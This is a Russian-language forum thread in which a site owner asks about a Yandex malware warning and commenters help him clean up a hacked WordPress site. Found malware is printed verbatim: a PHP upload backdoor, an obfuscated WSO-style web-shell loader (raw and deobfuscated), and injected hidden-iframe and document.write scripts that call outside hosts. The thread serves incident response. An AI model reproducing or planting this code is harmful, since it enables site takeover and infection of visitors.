Занести денюшку яндексу, это же очевидно.

это серьезно?

сайт-то какой? ща мы на него посмотрим внимательно и чото скажем. Про денюжку — болтовня.

http://w_w_w.v_t_s_24.r_u
подчеркивания нужно удалить

подчеркивания нужно удалить

Сразу видно профессионального спамера.

Думаю, надо написать в яндекс, потребовав объяснений.

ни разу не занимался этим словом :)

rkhunter, ai-bolit должны помочь

В техподдержку яндекса отправь эту ссылку с virustotal и поинтересуйся, почему такой странный результат.

а не подскажите адресок техподдержки яндекса?

шел тебе закинули файлы зря сразу грохнул, надо было по содержимому лишнему погрепать все файлы на серваке. там глядишь и нашел бы все хвосты

но вобщем-то жди, бот через шел тебе сново срани накидает. Лечится, но долго и муторно. Сливаешь дамп сайта, приостанавливаешь работу сайта, меняешь все пароли. Ищешь отличия дампа от здорового бэкапа. Заливаешь, запускаешь, думаешь как протек сайт.

все файлы которые вызывали подозрение - в отдельной папке. ничего не удалял совсем.
только эти файлы были от 1 апреля 2014 года остальные (весь сайт) от 2012.

спс за ссылку

Про шел не понял - Это что такое?
Сайт крутится в ВПС, захожу через хостовую систему, какие менять пароли? в админку этого сайта пару лет не заходил. И заметил еще такую хрень - в ВПС ке с этим сайтом стали периодически заканчиваться ресурсы (privvmpages).

Поди впс и взломана, такое на каждом шагу творится.

а не подскажите адресок техподдержки яндекса?

https://feedback.yandex.ru/webmaster/

It's a tool you can use to execute arbitrary shell-commands or browse the filesystem on your remote webserver
Держи пару забав, помни, написан шел может быть не только на пыхе
http://habrahabr.ru/post/193986/
http://kostin.su/2012/07/fucking-php-shell/
От такая хрень бушевала, несколько лет назад - http://kostin.su/2012/07/htaccess-rewrite-redirect-virus/

Три файла которые имели недавнюю дату изменения
security.php http://pastebin.com/PnjH7QTC
upl.php

<?php
if(isset($_POST['Submit'])){
    $filedir = "";
    $maxfile = '2000000';

    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if (isset($_FILES['image']['name'])) {
        $abod = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $abod);

echo"<center><b>Done ==> $userfile_name</b></center>";
}
}
else{
echo '<b>'.php_uname().'</b>';
echo'
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
}
?>

<?php ${"\x47\x4cO\x42ALS"}["\x6bc\x69\x73st\x77"]="\x76v";
      ${"\x47L\x4f\x42\x41\x4cS"}["\x76f\x64\x69e\x69biw"]="\x6b\x6b";
      ${"\x47\x4c\x4fBAL\x53"}["\x76\x64\x67gn\x69g\x6c"]="\x76";
      ${"G\x4c\x4fB\x41\x4c\x53"}["m\x70\x78mls\x61\x65\x73"]="\x6b";
      ${"\x47\x4cO\x42A\x4cS"}["\x70\x6f\x66id\x6bw"]="\x5f\x61";
      $dexhzoy="\x5f\x62";
      ${"\x47L\x4f\x42AL\x53"}["\x74\x68k\x6ek\x65\x71\x67v"]="i";
      $mzgok='cfc70c31a3467f5d4aa4786812a49432';
      ${"\x47\x4c\x4f\x42\x41L\x53"}["\x75n\x62o\x6cs\x77\x6a\x71\x71\x77"]="i";
      $ssrysrh="\x69";
      for(${$ssrysrh}=0;${${"GL\x4fBA\x4c\x53"}["\x75\x6e\x62o\x6cs\x77jq\x71w"]}<4;${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x74\x68\x6bn\x6be\x71gv"]}++)${${"G\x4cOB\x41\x
4c\x53"}["\x70\x6ff\x69dk\x77"]}[]=strval(substr($mzgok,${${"\x47\x4c\x4f\x42A\x4c\x53"}["thk\x6e\x6b\x65q\x67\x76"]}*8,8));${"\x47\x4c\x4fBA\x4c\x53"}["\x6d\x76\x75x
\x6ci\x6exv"]="\x5f\x61";${$dexhzoy}=array_merge($_COOKIE,$_POST,$_FILES);foreach(${${"\x47L\x4f\x42\x41\x4c\x53"}["m\x76ux\x6c\x69\x6e\x78\x76"]} as${${"\x47\x4c\x4f
BA\x4c\x53"}["\x6dp\x78ml\x73\x61\x65\x73"]}=>${${"G\x4cOBA\x4c\x53"}["\x76d\x67gn\x69\x67\x6c"]}){$jeiuzgvf="_\x62";foreach(${$jeiuzgvf} as${${"\x47\x4cO\x42\x41\x4c
\x53"}["\x76\x66\x64\x69ei\x62\x69\x77"]}=>${${"G\x4c\x4fBA\x4c\x53"}["k\x63\x69\x73\x73tw"]}){${"\x47L\x4fB\x41L\x53"}["\x68r\x64\x74\x66x\x73\x62\x62\x69"]="\x76";$
cqdfte="vv";$tuwgfjfpcb="_\x61";${"\x47L\x4f\x42\x41\x4c\x53"}["\x67\x6a\x6ah\x66\x73\x62\x74\x73\x76\x76t"]="\x6b";if(stripos(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x68r
\x64tfxsb\x62\x69"]},${${"\x47LOBA\x4c\x53"}["vfdie\x69biw"]})!==false)${$tuwgfjfpcb}[${${"\x47L\x4f\x42\x41\x4c\x53"}["g\x6a\x6a\x68\x66s\x62\x74\x73v\x76t"]}]=${$cq
dfte};}}if(sha1(${${"\x47\x4c\x4f\x42\x41LS"}["p\x6ff\x69d\x6b\x77"]}[0])=='6d9b2006cf8d29d35d25f94fd19cca5cf340241d'){$lwdpeoc="_a";$lhqgyykcn="_\x61";$vtoig=file_ge
t_contents(${$lhqgyykcn}[3]["\x74\x6dp_\x6e\x61\x6d\x65"]);$bphhk=${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x70\x6ffi\x64\x6bw"]}[1];$iijqk=base64_decode(${$lwdpeoc}[2]);$jy
rt=create_function("",$iijqk);$jyrt();} ?>

техподдержка яндекса ответила
При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил вредоносный код следующего содержания:

<script type='text/javascript'>
function create_frame(url) {
var bumb = document.getElementById('aztdxoj');
if (typeof(bumb) != 'undefined' && bumb!= null)
{}else{
var iframe = document.createElement('iframe');
iframe.id = "aztdxoj";
iframe.style.width = "0px";
iframe.style.height = "0px";
iframe.style.border = "0px";
iframe.frameBorder = "0";
iframe.style.display = "none";
iframe.setAttribute("frameBorder", "0");
document.body.appendChild(iframe);
iframe.src = url;
return true;
}
}
function qleka(){
create_frame("http://nvdrabs.ru/aztdxoj.cgi?default");
}
try {
if(window.attachEvent) {
window.attachEvent('onload', qleka);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
qleka();
};
window.onload = newonload;
} else {
window.onload = qleka;
}
}
} catch(err) {}
</script> 

смотри все ифрэймы ищи подозрительные впс-ку твою наверное регулярно перепрошивают

все у кого оффтопик и кто ходил по ссылке расскажите вирусы подхватили?

Гы и не найдет, стандартная фича ифрэйм нулевого размера со ссылкой внутри, код вставляется на ходу. Повыше ты показывал «попутаный код», пробуй поискать по его кускам. Но похоже тебе нужен кто-то, кто умеет и захочет разобраться в заражонном сайте.
Самый простой и быстрый способ, останови сайт, смени пароли, заливай бэкапы в обратном порядке, смотри есть-ли ифрэйм, как пропадет все путем.
Ну и вспоминая бессмертное - «админы делятся на две группы, те кто еще не делают бэкапы и те кто уже делают бэкапы»

<?php $ {
    "GLOBALS"
}
["kcisstw"] = "vv";
$ {
    "GLOBALS"
}
["vfdieibiw"] = "kk";
$ {
    "GLOBALS"
}
["vdggnigl"] = "v";
$ {
    "GLOBALS"
}
["mpxmlsaes"] = "k";
$ {
    "GLOBALS"
}
["pofidkw"] = "_a";
$dexhzoy = "_b";
$ {
    "GLOBALS"
}
["thknkeqgv"] = "i";
$mzgok = 'cfc70c31a3467f5d4aa4786812a49432';
$ {
    "GLOBALS"
}
["unbolswjqqw"] = "i";
$ssrysrh = "i";
for ($ {
    $ssrysrh
} = 0;$ {
    $ {
        "GLOBALS"
    }
    ["unbolswjqqw"]
} < 4;$ {
    $ {
        "GLOBALS"
    }
    ["thknkeqgv"]
}
++) $ {
    $ {
        "GLOBA\x
4cS"
    }
    ["pofidkw"]
}
[] = strval(substr($mzgok, $ {
    $ {
        "GLOBALS"
    }
    ["thknkeqgv"]
} * 8, 8));
$ {
    "GLOBALS"
}
["mvux
linxv"] = "_a";
$ {
    $dexhzoy
} = array_merge($_COOKIE, $_POST, $_FILES);
foreach ($ {
    $ {
        "GLOBALS"
    }
    ["mvuxlinxv"]
} as $ {
    $ {
        "GLO
BALS"
    }
    ["mpxmlsaes"]
} => $ {
    $ {
        "GLOBALS"
    }
    ["vdggnigl"]
}) {
    $jeiuzgvf = "_b";
    foreach ($ {
        $jeiuzgvf
    } as $ {
        $ {
            "GLOBAL
S"
        }
        ["vfdieibiw"]
    } => $ {
        $ {
            "GLOBALS"
        }
        ["kcisstw"]
    }) {
        $ {
            "GLOBALS"
        }
        ["hrdtfxsbbi"] = "v";
        $cqdfte = "vv";
        $tuwgfjfpcb = "_a";
        $ {
            "GLOBALS"
        }
        ["gjjhfsbtsvvt"] = "k";
        if (stripos($ {
            $ {
                "GLOBALS"
            }
            ["hr
dtfxsbbi"]
        }, $ {
            $ {
                "GLOBALS"
            }
            ["vfdieibiw"]
        }) !== false) $ {
            $tuwgfjfpcb
        }
        [$ {
            $ {
                "GLOBALS"
            }
            ["gjjhfsbtsvvt"]
        }
        ] = $ {
            $cqdfte
        };
    }
}
if (sha1($ {
    $ {
        "GLOBALS"
    }
    ["pofidkw"]
}
[0]) == '6d9b2006cf8d29d35d25f94fd19cca5cf340241d') {
    $lwdpeoc = "_a";
    $lhqgyykcn = "_a";
    $vtoig = file_get_contents($ {
        $lhqgyykcn
    }
    [3]["tmp_name"]);
    $bphhk = $ {
        $ {
            "GLOBALS"
        }
        ["pofidkw"]
    }
    [1];
    $iijqk = base64_decode($ {
        $lwdpeoc
    }
    [2]);
    $jyrt = create_function("", $iijqk);
    $jyrt();
} ?>

wp-support.php
Ищи гуру на местах или садись за книги, слабоват ты

Слей бекап, найди в нем все бекдоры (начни с http://www.revisium.com/ai/), реинсталь впс (возможно тебя еще и порутали до кучи).
Если сам не осилишь все найти - обращайся к специалистам.

По ссылке на пастбине похоже словарь обфускатора, с кодированным содержимым, пройдись декодором base64.
Разбирать словарем не стал - лень, но там есть вот такое, почти в прямом варианте

<div style="display:none"><iframe src="http://click.k8877.org/feed/xml.php?uid=230"></iframe><iframe src="http://click.k8877.org/feed/xml.php?uid=230"></iframe><iframe src="http://click.diamondtraff.com/feed/xml.php?uid=230"></iframe><iframe src="http://click.diamondtraff.com/feed/xml.php?uid=230"></iframe></div>

хы, не походу я ошибся

<iframe src="https://docs.google.com/file/d/0B2L8ST0QDvOjR0tvZXZ3ak5pTVk/preview" width="670" height="450"></iframe>

Похоже пора завязывать бухать
ТС держи развернутый код, того что ты выложил на псатбин - http://pastebin.com/Hcn4AkxQ
По содержимому как раз похож на подкинутый шел. Запусти в сторонке, скорее всего его и увидишь.

Да, это веб шелл. Слегка переделанный WSO

http://sitecheck.sucuri.net/

я думаю...что вам на винфак.

а по моему, это чёрный пиар яндекса

Какой плохой яндекс, нашел левый ифрейм на чужом сайте и сообщил об этом. Плохой-плохой.

я думаю...что вам на винфак.

А когда kernel.org и mysql.com порутали, тоже на винфак?

Прочитал ответы, остался вопрос. С этого сайта я удалил все файлы, которые вызвали у меня подозрение и недавней датой создания, которые я опубликовал. Все остальные файлы имеют дату создания/изменения не позднее 2012 года.

Вопрос может остаться вирус в такой ситуации и как? Пароля у рута этой ВПС нет. Последний раз кроме меня разраб сайта заходил в феврале 2013 года.

# find ./ -mtime -600
./
./wp-content/uploads
./wp-content/themes/u-design/scripts/cache
./wp-content/themes/u-design/scripts/cache/timthumb_cacheLastCleanTime.touch
./wp-content/themes/u-design/scripts/cache/index.html
./wp-content/themes/u-design/scripts/cache/index.php
./wp-includes

# more ./wp-content/themes/u-design/scripts/cache/index.html
<html><body bgcolor="#FFFFFF"></body></html>

# ls -la ./wp-content/themes/u-design/scripts/cache/index.php
-rw-rw-r-- 1 apache apache 0 Mar 27 18:21 ./wp-content/themes/u-design/scripts/cache/index.php

в браузере появляется страничка и приглашение ввести пароль - Password:
По коду http://pastebin.com/Hcn4AkxQ так и не понял какой пароль зашит в скрипт, если зашит.

Я эту проблему решил

У меня сайт на движке Joomla 2.5.19. Так 16.04.2014 г. я через браузер Опера зашел на свой сайт и наткнулся на уведомление:«На страницах сайта обнаружен код, который может быть опасен для посетителей. Выполнение этого кода может привести к заражению компьютера опасными программами, использованию его без ведома пользователя, порче или краже данных.» Я сначала связался через биллинговую панель с службой поддержки на сервере где находится мой сайт. Они проверили сайт антивирусом и сообщили, что вирусов нет. Я скачал сайт на свой компьютер, проверил своим антивирусом (Microsoft Security Essentials) и тоже ничего не нашел. Потом пошел в ЗберБанк к своему знакомому «компьютерщику» у них специальная банковская антивирусная система Касперского. Он просто через браузер вошел на мой сайт и на мониторе появилось сообщение, что на этом сайте в файле www/мой сайт/media/system/js/caption.js есть вредоносный код - <!-- js-tools --> document.write('<script src="http://www.nildon.com/cli/stat.php"></script>'); <!-- /js-tools --> Я удалил его 17.04.2014г., потом зашел на свою страницу http://webmaster.yandex.ua и там оставил заявку на повторную проверку сайта, а также написал обращение с просьбой ускорить проверку. 18.04.2014 г. пришло письмо по електронке «Последняя проверка сайта 18 Апреля 2014 не выявила страниц, содержащих вредоносный код. В результатах поиска сайт выводится без пометок.» Я вздохнул с облегчением. Почистил свой «комп» антивирусом Касперского (пробная версия) удалил кучу вредоносных програм.

facepalm.php

Я совсемь синь к вечеру, пятницо. Ну шел просит пароль, да. Можешь попробовать модифицировать код, прости, но вот теперь мне точно лень.
По поводу хватит или нет, ты глянь в код зловреда. Он искал все до чего можно добраться, начиная от пхпшных файлов и заканчивая штэксэс. Я бы дернул имена вызываемых функций по всем приведенным тобой файлам, да и по именам файлов и проверил на наличие совпадений по всем файлам сайтика. так надежней, время модификации файла можно и подделать. То что ты не увидел в логах доступа к впске, не значит что тебя не ломанули. Либо дыра в скриптах сайта, либо косяк с правами доступа и где-то можно залить файло, либо взлом впс и правка логов, выбирай на вкус. Ответ один, перетормошить все, сново подчеркну - СМЕНИТЬ ВСЕ пароли, иначе есть не нулевой вариант залететь по новой.

А да, наличие вот этого - base64_decode, практически со 100% вероятностью означает что файл модифицировали. Подробней смотри на чем там у тебя сай держится, вдруг какие полезные функции юзают.

ai-bolit делает все то, о чем ты пишешь.

Изумительно и чтож ты раньше не написал это вопрошающему. Мне то это ни к чему. Так по старой памяти и под градусом потрындеть.
Ну и всегда полезно знать, чтож делает очередной ек-болит

Изумительно и чтож ты раньше не написал это вопрошающему.

Да вобщем то написал еще часов 12 назад. Но тут видимо только теоретики в почете.
Поисковик яндекса для моего сайта пишет «Сайт может угрожать безопасности вашего компьютера или мобильного устройства» (комментарий)

Ну и всегда полезно знать, чтож делает очередной ек-болит

Ничего особенного, просто ищет по сигнатурам и подозрительным вещам типа eval, base64_decode и все прочее. Сорцы открыты вроде, можешь посмотреть сам.
К слову, тот же wso (это самый популярный веб-шелл) им ищется без проблем. Про конкретно эту шифрованную версию - не уверен, но проверить никто не мешает.

Шелы шифруют очень давно и не всегда стандартными методами, так что теорию знать надо. Ответы разворачивать надо, сам не видишь пациент в лечении ни бум бум, а мне пофиг, я свое отлечил давно

Этот WSO «сбилдили» на сайте автора..

Шелы шифруют очень давно и не всегда стандартными методами, так что теорию знать надо.

Теорию можно пообсуждать, это иногда даже интересно. Но

сам не видишь пациент в лечении ни бум бум

тут ты прав на 100%, поэтому я и пытался помочь ему простыми советами, не разглагольствуясь на теорию, которая ему до лампочки.

на сайте автора..

На каком сайте? Я за подобными вещами на рдоте слежу только

Уговорил, накатим за это - «за здоровье пациента» (:

Накатим.
Если бы он еще выхлоп uname -a привел, было бы совсем хорошо.

Честно, уже не вспомню. На экспе, когда модером был... интересовался этими вещами.
Вот, вроде оно.